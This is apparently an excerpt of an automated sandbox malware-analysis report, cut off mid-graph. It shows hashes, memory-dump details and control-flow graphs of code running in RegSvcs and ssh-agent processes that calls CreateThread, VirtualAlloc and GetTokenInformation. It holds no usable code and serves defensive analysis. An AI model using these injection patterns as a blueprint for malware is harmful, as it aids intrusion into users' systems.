                                                                                                                                                          • API String ID: 0-2567626648
                                                                                                                                                          • Opcode ID: 6a109988e51b8f6ab7c9222d19bfda1d43803e13a8f1ebc795264d9dd56e973c
                                                                                                                                                          • Instruction ID: 222236ea72c44708bb97b4fc0c95983d2319d18edd1c0b4df67c3adb6ac4eb88
                                                                                                                                                          • Opcode Fuzzy Hash: 6a109988e51b8f6ab7c9222d19bfda1d43803e13a8f1ebc795264d9dd56e973c
                                                                                                                                                          • Instruction Fuzzy Hash: C2519371D0426A8FCF64CBBA88503FFBBB1AF89310F5445A6C449B7251EB319949CBA1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \;gq$\;gq$\;gq$\;gq
                                                                                                                                                          • API String ID: 0-1347663453
                                                                                                                                                          • Opcode ID: 9f781807ee1dc052156d5a03937c09b8210c7303431ecfcdcaa08b59319ef434
                                                                                                                                                          • Instruction ID: 2f39528ae22e2148007c1304d101be038169ccd46e33b91c148207536251357d
                                                                                                                                                          • Opcode Fuzzy Hash: 9f781807ee1dc052156d5a03937c09b8210c7303431ecfcdcaa08b59319ef434
                                                                                                                                                          • Instruction Fuzzy Hash: 520171317100298F8B288F2EC450A2777E6AF896707D5416BE449DB3B4DB71DC86C790

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:62
                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                          execution_graph 3856 d683e7 3859 d681e5 3856->3859 3857 d6830b CloseHandle 3857->3859 3858 d68212 GetTokenInformation 3858->3859 3861 d68220 3858->3861 3859->3857 3859->3858 3860 d68357 GetTokenInformation 3859->3860 3859->3861 3860->3859 3943 d65d22 3944 d65cd4 CreateThread CloseHandle 3943->3944 3947 d65bbc 3943->3947 3944->3947 3945 d65c2c 3946 d65d56 CreateThread 3946->3947 3947->3944 3947->3945 3947->3946 3948 d65c84 3947->3948 3949 d65990 VirtualAlloc 3948->3949 3950 d65dcd 3949->3950 3950->3950 3901 d681e3 3905 d681e5 3901->3905 3902 d68357 GetTokenInformation 3902->3905 3903 d6830b CloseHandle 3903->3905 3904 d68212 GetTokenInformation 3904->3905 3906 d68220 3904->3906 3905->3902 3905->3903 3905->3904 3905->3906 3862 d65d50 CreateThread 3869 d65bbc 3862->3869 3863 d65cd4 CreateThread CloseHandle 3863->3869 3864 d65c84 3870 d65990 3864->3870 3865 d65c2c 3867 d65dcd 3867->3867 3868 d65d56 CreateThread 3868->3869 3869->3863 3869->3864 3869->3865 3869->3868 3872 d65994 wcscpy 3870->3872 3871 d65a23 3871->3867 3872->3871 3873 d65a8d VirtualAlloc 3872->3873 3873->3872 3931 d68201 3933 d68220 3931->3933 3934 d681e5 3931->3934 3932 d6830b CloseHandle 3932->3934 3934->3932 3934->3933 3935 d68357 GetTokenInformation 3934->3935 3936 d68212 GetTokenInformation 3934->3936 3935->3934 3936->3933 3936->3934 3896 d658de 3897 d753f0 VirtualAlloc 3896->3897 3898 d658f9 3897->3898 3899 d681c0 3 API calls 3898->3899 3900 d65907 3899->3900 3874 d65b8f 3885 d753f0 3874->3885 3876 d65baf 3890 d681c0 3876->3890 3878 d65c2c 3879 d65c84 3880 d65990 VirtualAlloc 3879->3880 3881 d65dcd 3880->3881 3881->3881 3882 d65d56 CreateThread 3883 d65bbc 3882->3883 3883->3878 3883->3879 3883->3882 3884 d65cd4 CreateThread CloseHandle 3883->3884 3884->3883 3886 d753f4 3885->3886 3887 d7545e VirtualAlloc 3886->3887 3889 d753f6 3886->3889 3888 d75460 3887->3888 3888->3886 3889->3876 3895 d681e5 3890->3895 3891 d6830b CloseHandle 3891->3895 3892 d68357 GetTokenInformation 3892->3895 3893 d68220 3893->3883 3894 d68212 GetTokenInformation 3894->3893 3894->3895 3895->3891 3895->3892 3895->3893 3895->3894

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 d681c0-d681d8 1 d683bf-d683ca 0->1 3 d68277-d6827a 1->3 4 d683d0 1->4 5 d68241 3->5 6 d6827c 3->6 4->3 7 d683d6 4->7 9 d68376-d6837b 5->9 10 d68251-d68256 call d972f4 5->10 6->5 8 d6827e 6->8 11 d683d7-d683dd 7->11 15 d68284 8->15 16 d6830b-d68311 CloseHandle 8->16 12 d682f0-d6831c 9->12 13 d68381 9->13 19 d6825b-d68260 10->19 30 d681e5 12->30 31 d68322 12->31 13->12 18 d68387 13->18 20 d6832e-d68330 15->20 16->20 18->3 22 d68390-d68393 18->22 19->22 23 d68332 20->23 24 d682dd-d682e3 20->24 22->8 27 d68399 22->27 23->24 26 d68334 23->26 28 d683a3-d683a4 24->28 29 d682e9 24->29 32 d6f524-d6f52e 26->32 27->8 33 d6839f-d683a1 27->33 29->28 34 d682ef 29->34 36 d682a3-d682a5 30->36 37 d681eb 30->37 31->30 38 d68328-d6832c 31->38 35 d6f807 32->35 33->28 34->12 41 d6f8df-d6f8e0 35->41 42 d6f80d 35->42 39 d682ab 36->39 40 d683f9 36->40 43 d682b2-d6836f GetTokenInformation 37->43 44 d681f1 37->44 38->20 45 d682c5-d682c8 38->45 39->40 48 d682b1 39->48 46 d682d2-d682d7 40->46 47 d683ff 40->47 54 d715a5-d715aa 41->54 42->41 49 d6f813 42->49 43->9 44->43 50 d681f7 44->50 45->40 52 d682ce 45->52 53 d68306-d68309 46->53 47->32 48->43 59 d6f78f 49->59 60 d6f81b 49->60 56 d6828e 50->56 57 d682d0 52->57 58 d6828f-d68303 call d972ec 52->58 53->16 53->20 62 d715ae-d715af 54->62 56->58 57->46 57->58 58->53 68 d6834f-d68355 58->68 59->60 63 d6f795 59->63 60->41 65 d715b2-d715b7 62->65 63->35 67 d715ba-d715c1 65->67 69 d715c7-d715d2 67->69 70 d71750-d717a2 call d972f4 67->70 77 d68212-d6821a GetTokenInformation 68->77 78 d68341 68->78 72 d715d4-d715d6 69->72 73 d71620-d71623 69->73 80 d71670-d71684 72->80 81 d715dc-d715df 72->81 75 d71625-d71628 73->75 76 d716a0-d716b4 73->76 75->67 82 d7162a-d71636 75->82 87 d716b6-d716b9 76->87 88 d716f4-d716f5 76->88 83 d68220-d68234 77->83 84 d683af 77->84 78->77 86 d68347 78->86 80->54 85 d7168a-d7168d 80->85 81->67 89 d715e1-d715f6 81->89 91 d716dc-d716ec 82->91 92 d71638-d71640 82->92 83->11 113 d6823a 83->113 84->10 93 d683b5 84->93 94 d71693-d71697 85->94 95 d7172f-d71738 85->95 86->92 96 d6834d 86->96 97 d716bb 87->97 98 d7173a-d7173b 87->98 103 d716fe-d7170c 88->103 99 d716d2-d716d7 89->99 100 d715fc-d71600 89->100 91->69 101 d716f2 91->101 104 d71646-d7165f 92->104 105 d7170e-d71727 92->105 93->10 106 d683bb-d683bd 93->106 108 d716bf-d716cd 94->108 107 d7173f-d71740 95->107 96->68 97->108 98->107 99->62 102 d71606-d71618 100->102 100->103 101->70 102->65 110 d71744-d71748 103->110 104->69 112 d71665 104->112 105->69 111 d7172d 105->111 106->1 107->110 111->70 112->70 113->11 114 d68240 113->114 115 d7b32e-d7b330 114->115 116 d7b332-d7b337 call d972f4 115->116 117 d7b300 115->117 116->117 125 d7b339 116->125 121 d7b302 117->121 122 d7b2fd 117->122 123 d7b305 122->123 124 d7b2ff 122->124 126 d7b322-d7b32d 123->126 127 d7b308-d7b315 123->127 124->127 125->117 128 d7b33b-d7b33f 125->128 126->115 127->123 130 d7b317 127->130 128->127 130->122
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                          • Instruction ID: 33d543c06fb7ce1c55dc4ec0c2aba1d85fca0a70b74a47e6db9710c39d688f01
                                                                                                                                                          • Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                          • Instruction Fuzzy Hash: 0DB1F23451CE458BCB29CB1C8491279B7A2FF99314F6CC35AD4CB87266EE24DC42A376

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 131 d65b8f-d65c20 call d753f0 call d98358 call d80320 call d681c0 141 d65c26 131->141 142 d65cf4-d65d08 call d972ec 131->142 141->142 143 d65c2c-d65c2f 141->143 146 d65c87-d65dc8 call d65e60 call d65990 142->146 147 d65d0e 142->147 159 d65dcd 146->159 147->146 149 d65d14-d65d18 147->149 153 d65c65 149->153 154 d65daf-d65db6 call d652d0 149->154 156 d65c67 153->156 157 d65ca3 call d65df0 153->157 165 d65c30-d65c39 154->165 166 d65dbc 154->166 156->157 161 d65c69-d65c9d 156->161 168 d65c45-d65d6d call d81520 157->168 159->159 179 d65c85 161->179 180 d65c9f 161->180 182 d65bf7 165->182 183 d65cb9-d65cbd 165->183 169 d65dbe 166->169 170 d65d7d-d65d89 166->170 188 d65bfd-d65c06 168->188 193 d65d73 168->193 169->170 178 d65d9b 169->178 176 d65d94 170->176 177 d65d8b-d65d92 170->177 176->143 191 d65cb3 176->191 177->176 184 d65d9c 177->184 178->184 179->146 180->179 186 d65ca1 180->186 182->183 182->188 189 d65d56-d65d5b CreateThread 183->189 190 d65cc3 183->190 195 d65da5-d65da8 184->195 186->157 188->195 197 d65c7e 189->197 198 d65d1f-d65d45 189->198 190->189 194 d65cc9 190->194 191->143 191->183 193->188 199 d65d79-d65d7b 193->199 194->189 195->154 197->198 200 d65c84 197->200 202 d65d47 198->202 203 d65cd4-d65cea CreateThread CloseHandle 198->203 199->170 200->179 202->203 203->177 205 d65cf0-d65d4d 203->205 205->176
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                          • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction ID: c6586bd2f28415ae7a49241d727d61fddc268249a01588d86357f4434c9b0ed9
                                                                                                                                                          • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                          • Instruction Fuzzy Hash: 28410630618F098FDB68A728B45833937E0EB59310F5E01AAD087CB1EDDA65CCC59B72

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 207 d65d22-d65d45 208 d65d47 207->208 209 d65cd4-d65cea CreateThread CloseHandle 207->209 208->209 211 d65cf0-d65d4d 209->211 212 d65d8b-d65d92 209->212 214 d65d94 211->214 212->214 215 d65d9c 212->215 218 d65cb3 214->218 219 d65c2c-d65c2f 214->219 217 d65da5-d65db6 call d652d0 215->217 230 d65c30-d65c39 217->230 231 d65dbc 217->231 218->219 220 d65cb9-d65cbd 218->220 222 d65d56-d65d5b CreateThread 220->222 223 d65cc3 220->223 228 d65c7e 222->228 229 d65d1f-d65d45 222->229 223->222 226 d65cc9 223->226 226->222 228->229 232 d65c84-d65dc8 call d65e60 call d65990 228->232 229->208 229->209 230->220 243 d65bf7 230->243 235 d65dbe 231->235 236 d65d7d-d65d89 231->236 250 d65dcd 232->250 235->236 242 d65d9b 235->242 236->212 236->214 242->215 243->220 245 d65bfd-d65c06 243->245 245->217 250->250
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction ID: 8a769d35e7549754a8749c41d987f6c20e81616093274379c22ea0c56e0b1f53
                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                          • Instruction Fuzzy Hash: 33F0C220618E0587DB2C8329B85933A63C1A799320F6E075AC097C90DCDA65C9C59A35

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 251 d65d50-d65d5b CreateThread 252 d65c78 251->252 253 d65c7e 252->253 254 d65d1f-d65d45 252->254 253->254 255 d65c84-d65dc8 call d65e60 call d65990 253->255 257 d65d47 254->257 258 d65cd4-d65cea CreateThread CloseHandle 254->258 276 d65dcd 255->276 257->258 262 d65cf0-d65d4d 258->262 263 d65d8b-d65d92 258->263 266 d65d94 262->266 263->266 267 d65d9c 263->267 272 d65cb3 266->272 273 d65c2c-d65c2f 266->273 271 d65da5-d65db6 call d652d0 267->271 283 d65c30-d65c39 271->283 284 d65dbc 271->284 272->273 275 d65cb9-d65cbd 272->275 278 d65d56-d65d5b CreateThread 275->278 279 d65cc3 275->279 276->276 278->252 279->278 281 d65cc9 279->281 281->278 283->275 292 d65bf7 283->292 286 d65dbe 284->286 287 d65d7d-d65d89 284->287 286->287 291 d65d9b 286->291 287->263 287->266 291->267 292->275 293 d65bfd-d65c06 292->293 293->271
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction ID: 189868bfca133eb5f7366407a5590e47c69b771cf8d64547faf8e4d34f23e0bf
                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                          • Instruction Fuzzy Hash: 6EB01210529F87574135133034081280A806E46234EBE1FACCFF3068DAD8205C846F30

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 295 d65990-d6599b 297 d65a33-d65a61 call d99b00 295->297 298 d659a1 295->298 308 d65ab4-d65aba call d81080 297->308 309 d65a63 297->309 298->297 299 d659a7-d659ab 298->299 304 d659b1-d659f3 call d92320 299->304 305 d65a59 299->305 304->305 326 d659f5-d659fa 304->326 306 d65a25-d65a2d 305->306 307 d65a5b 305->307 315 d65a70-d65a7b 306->315 316 d65a2f 306->316 307->306 318 d65a23 307->318 327 d65a83-d65a88 call d65df0 308->327 328 d65a13 308->328 309->308 313 d65a65 309->313 313->315 319 d65a16-d65a1e call d81470 315->319 320 d65a7d 315->320 316->313 324 d65a24 318->324 334 d65a96-d65ac2 319->334 320->319 325 d65a7f-d65a81 320->325 325->327 330 d65a51-d65a54 call d9233c 326->330 331 d659fc 326->331 337 d65a8d VirtualAlloc 327->337 328->327 333 d65a15 328->333 330->305 331->330 336 d659fe-d65a02 331->336 333->319 334->324 339 d65ac8 334->339 336->330 337->334 339->324 340 d65ace 339->340 340->297
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction ID: d6c9d1120d7fcb6c7d60827d2d754acd6bf9171092769783e725bb7027e336ca
                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                          • Instruction Fuzzy Hash: 2521283055DE848FC76A93A874D12B526A2F799324F5C03CBD0C6CB28ED928BDC58372

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 342 d68245-d68247 343 d682d2-d682d7 342->343 344 d6824d-d6824f 342->344 346 d68306-d68309 343->346 345 d68251-d68260 call d972f4 344->345 353 d68390-d68393 345->353 348 d6832e-d68330 346->348 349 d6830b-d68311 CloseHandle 346->349 351 d68332 348->351 352 d682dd-d682e3 348->352 349->348 351->352 354 d68334 351->354 355 d683a3-d683a4 352->355 356 d682e9 352->356 358 d6827e 353->358 359 d68399 353->359 357 d6f524-d6f52e 354->357 356->355 360 d682ef 356->360 361 d6f807 357->361 358->349 362 d68284 358->362 359->358 363 d6839f-d683a1 359->363 366 d682f0-d6831c 360->366 364 d6f8df-d6f8e0 361->364 365 d6f80d 361->365 362->348 363->355 369 d715a5-d715aa 364->369 365->364 368 d6f813 365->368 376 d681e5 366->376 377 d68322 366->377 371 d6f78f 368->371 372 d6f81b 368->372 374 d715ae-d715af 369->374 371->372 375 d6f795 371->375 372->364 378 d715b2-d715b7 374->378 375->361 379 d682a3-d682a5 376->379 380 d681eb 376->380 377->376 381 d68328-d6832c 377->381 382 d715ba-d715c1 378->382 383 d682ab 379->383 384 d683f9 379->384 385 d682b2-d6836f GetTokenInformation 380->385 386 d681f1 380->386 381->348 387 d682c5-d682c8 381->387 388 d715c7-d715d2 382->388 389 d71750-d717a2 call d972f4 382->389 383->384 391 d682b1 383->391 384->343 390 d683ff 384->390 412 d68376-d6837b 385->412 386->385 392 d681f7-d6828e 386->392 387->384 394 d682ce 387->394 396 d715d4-d715d6 388->396 397 d71620-d71623 388->397 390->357 391->385 402 d6828f-d68303 call d972ec 392->402 401 d682d0 394->401 394->402 404 d71670-d71684 396->404 405 d715dc-d715df 396->405 398 d71625-d71628 397->398 399 d716a0-d716b4 397->399 398->382 407 d7162a-d71636 398->407 409 d716b6-d716b9 399->409 410 d716f4-d716f5 399->410 401->343 401->402 402->346 432 d6834f-d68355 402->432 404->369 408 d7168a-d7168d 404->408 405->382 411 d715e1-d715f6 405->411 415 d716dc-d716ec 407->415 416 d71638-d71640 407->416 417 d71693-d71697 408->417 418 d7172f-d71738 408->418 419 d716bb 409->419 420 d7173a-d7173b 409->420 425 d716fe-d7170c 410->425 421 d716d2-d716d7 411->421 422 d715fc-d71600 411->422 412->366 413 d68381 412->413 413->366 426 d68387 413->426 415->388 423 d716f2 415->423 428 d71646-d7165f 416->428 429 d7170e-d71727 416->429 431 d716bf-d716cd 417->431 430 d7173f-d71740 418->430 419->431 420->430 421->374 424 d71606-d71618 422->424 422->425 423->389 424->378 434 d71744-d71748 425->434 426->353 433 d68277-d6827a 426->433 428->388 436 d71665 428->436 429->388 435 d7172d 429->435 430->434 440 d68212-d6821a GetTokenInformation 432->440 441 d68341 432->441 437 d68241 433->437 438 d6827c 433->438 435->389 436->389 437->345 437->412 438->358 438->437 442 d68220-d68234 440->442 443 d683af 440->443 441->440 444 d68347 441->444 451 d683d7-d683dd 442->451 452 d6823a 442->452 443->345 446 d683b5 443->446 444->416 447 d6834d 444->447 446->345 448 d683bb-d683ca 446->448 447->432 448->433 456 d683d0 448->456 452->451 453 d68240 452->453 455 d7b32e-d7b330 453->455 458 d7b332-d7b337 call d972f4 455->458 459 d7b300 455->459 456->433 460 d683d6 456->460 458->459 468 d7b339 458->468 464 d7b302 459->464 465 d7b2fd 459->465 460->451 466 d7b305 465->466 467 d7b2ff 465->467 469 d7b322-d7b32d 466->469 470 d7b308-d7b315 466->470 467->470 468->459 471 d7b33b-d7b33f 468->471 469->455 470->466 473 d7b317 470->473 471->470 473->465
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                          • Instruction ID: 46ee09d54f7732cb9d4aa9c76475b46f850e5638ca544602ef1db0e14db5fbfe
                                                                                                                                                          • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                          • Instruction Fuzzy Hash: 35F0A47451EF818FCA26C718A07043AABA0AF55710B5D02DAD4C6CB212CE14DC05F776

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 605 d683e7-d683e9 606 d682c5-d682c8 605->606 607 d683ef 605->607 608 d682ce 606->608 609 d683f9 606->609 607->606 610 d683f5-d683f7 607->610 613 d682d0 608->613 614 d6828f-d68303 call d972ec 608->614 611 d682d2-d682d7 609->611 612 d683ff 609->612 610->609 617 d68306-d68309 611->617 616 d6f524-d6f52e 612->616 613->611 613->614 614->617 627 d6834f-d68355 614->627 618 d6f807 616->618 620 d6832e-d68330 617->620 621 d6830b-d68311 CloseHandle 617->621 623 d6f8df-d6f8e0 618->623 624 d6f80d 618->624 625 d68332 620->625 626 d682dd-d682e3 620->626 621->620 632 d715a5-d715aa 623->632 624->623 628 d6f813 624->628 625->626 629 d68334 625->629 630 d683a3-d683a4 626->630 631 d682e9 626->631 639 d68212-d6821a GetTokenInformation 627->639 640 d68341 627->640 636 d6f78f 628->636 637 d6f81b 628->637 629->616 631->630 635 d682ef 631->635 638 d715ae-d715af 632->638 646 d682f0-d6831c 635->646 636->637 641 d6f795 636->641 637->623 644 d715b2-d715b7 638->644 642 d68220-d68234 639->642 643 d683af 639->643 640->639 645 d68347 640->645 641->618 671 d683d7-d683dd 642->671 672 d6823a 642->672 649 d683b5 643->649 650 d68251-d68256 call d972f4 643->650 651 d715ba-d715c1 644->651 652 d6834d 645->652 653 d71638-d71640 645->653 674 d681e5 646->674 675 d68322 646->675 649->650 657 d683bb-d683ca 649->657 661 d6825b-d68260 650->661 658 d715c7-d715d2 651->658 659 d71750-d717a2 call d972f4 651->659 652->627 655 d71646-d7165f 653->655 656 d7170e-d71727 653->656 655->658 664 d71665 655->664 656->658 663 d7172d 656->663 702 d68277-d6827a 657->702 703 d683d0 657->703 667 d715d4-d715d6 658->667 668 d71620-d71623 658->668 673 d68390-d68393 661->673 663->659 664->659 677 d71670-d71684 667->677 678 d715dc-d715df 667->678 669 d71625-d71628 668->669 670 d716a0-d716b4 668->670 669->651 679 d7162a-d71636 669->679 686 d716b6-d716b9 670->686 687 d716f4-d716f5 670->687 672->671 680 d68240 672->680 688 d6827e 673->688 689 d68399 673->689 681 d682a3-d682a5 674->681 682 d681eb 674->682 675->674 683 d68328-d6832c 675->683 677->632 684 d7168a-d7168d 677->684 678->651 690 d715e1-d715f6 678->690 679->653 697 d716dc-d716ec 679->697 699 d7b32e-d7b330 680->699 681->609 698 d682ab 681->698 691 d682b2-d6836f GetTokenInformation 682->691 692 d681f1 682->692 683->606 683->620 700 d71693-d71697 684->700 701 d7172f-d71738 684->701 704 d716bb 686->704 705 d7173a-d7173b 686->705 708 d716fe-d7170c 687->708 688->621 693 d68284 688->693 689->688 694 d6839f-d683a1 689->694 695 d716d2-d716d7 690->695 696 d715fc-d71600 690->696 722 d68376-d6837b 691->722 692->691 711 d681f7 692->711 693->620 694->630 695->638 696->708 713 d71606-d71618 696->713 697->658 707 d716f2 697->707 698->609 714 d682b1 698->714 717 d7b332-d7b337 call d972f4 699->717 718 d7b300 699->718 716 d716bf-d716cd 700->716 712 d7173f-d71740 701->712 709 d68241 702->709 710 d6827c 702->710 703->702 719 d683d6 703->719 704->716 705->712 707->659 720 d71744-d71748 708->720 709->650 709->722 710->688 710->709 721 d6828e 711->721 712->720 713->644 714->691 717->718 732 d7b339 717->732 725 d7b302 718->725 726 d7b2fd 718->726 719->671 721->614 722->646 727 d68381 722->727 730 d7b305 726->730 731 d7b2ff 726->731 727->646 729 d68387 727->729 729->673 729->702 733 d7b322-d7b32d 730->733 734 d7b308-d7b315 730->734 731->734 732->718 735 d7b33b-d7b33f 732->735 733->699 734->730 737 d7b317 734->737 735->734 737->726
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000002.2856464837.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_2_d60000_ssh-agent.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction ID: 6ca20648da1eddf7a9955f574cc2df58f379d4211f0deaeb1cb291a3a09de73c
                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction Fuzzy Hash: C6F0B4B450DE41CBC635CB14E46053A6760BB69700B6C1399C4C6CB222CF24DC45F77A

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 474 d68318-d6831c 475 d681e5 474->475 476 d68322 474->476 477 d682a3-d682a5 475->477 478 d681eb 475->478 476->475 479 d68328-d6832c 476->479 480 d682ab 477->480 481 d683f9 477->481 482 d682b2-d6836f GetTokenInformation 478->482 483 d681f1 478->483 484 d682c5-d682c8 479->484 485 d6832e-d68330 479->485 480->481 488 d682b1 480->488 486 d682d2-d682d7 481->486 487 d683ff 481->487 506 d68376-d6837b 482->506 483->482 489 d681f7-d6828e 483->489 484->481 491 d682ce 484->491 492 d68332 485->492 493 d682dd-d682e3 485->493 495 d68306-d68309 486->495 494 d6f524-d6f52e 487->494 488->482 498 d6828f-d68303 call d972ec 489->498 497 d682d0 491->497 491->498 492->493 499 d68334 492->499 500 d683a3-d683a4 493->500 501 d682e9 493->501 502 d6f807 494->502 495->485 504 d6830b-d68311 CloseHandle 495->504 497->486 497->498 498->495 516 d6834f-d68355 498->516 499->494 501->500 505 d682ef 501->505 510 d6f8df-d6f8e0 502->510 511 d6f80d 502->511 504->485 507 d682f0-d6831c 505->507 506->507 508 d68381 506->508 507->475 507->476 508->507 513 d68387 508->513 519 d715a5-d715aa 510->519 511->510 515 d6f813 511->515 517 d68277-d6827a 513->517 518 d68390-d68393 513->518 521 d6f78f 515->521 522 d6f81b 515->522 533 d68212-d6821a GetTokenInformation 516->533 534 d68341 516->534 523 d68241 517->523 524 d6827c 517->524 527 d6827e 518->527 528 d68399 518->528 526 d715ae-d715af 519->526 521->522 530 d6f795 521->530 522->510 523->506 535 d68251-d68260 call d972f4 523->535 524->523 524->527 532 d715b2-d715b7 526->532 527->504 531 d68284 527->531 528->527 536 d6839f-d683a1 528->536 530->502 531->485 540 d715ba-d715c1 532->540 538 d68220-d68234 533->538 539 d683af 533->539 534->533 541 d68347 534->541 535->518 536->500 564 d683d7-d683dd 538->564 565 d6823a 538->565 539->535 544 d683b5 539->544 545 d715c7-d715d2 540->545 546 d71750-d717a2 call d972f4 540->546 547 d6834d 541->547 548 d71638-d71640 541->548 544->535 551 d683bb-d683ca 544->551 553 d715d4-d715d6 545->553 554 d71620-d71623 545->554 547->516 549 d71646-d7165f 548->549 550 d7170e-d71727 548->550 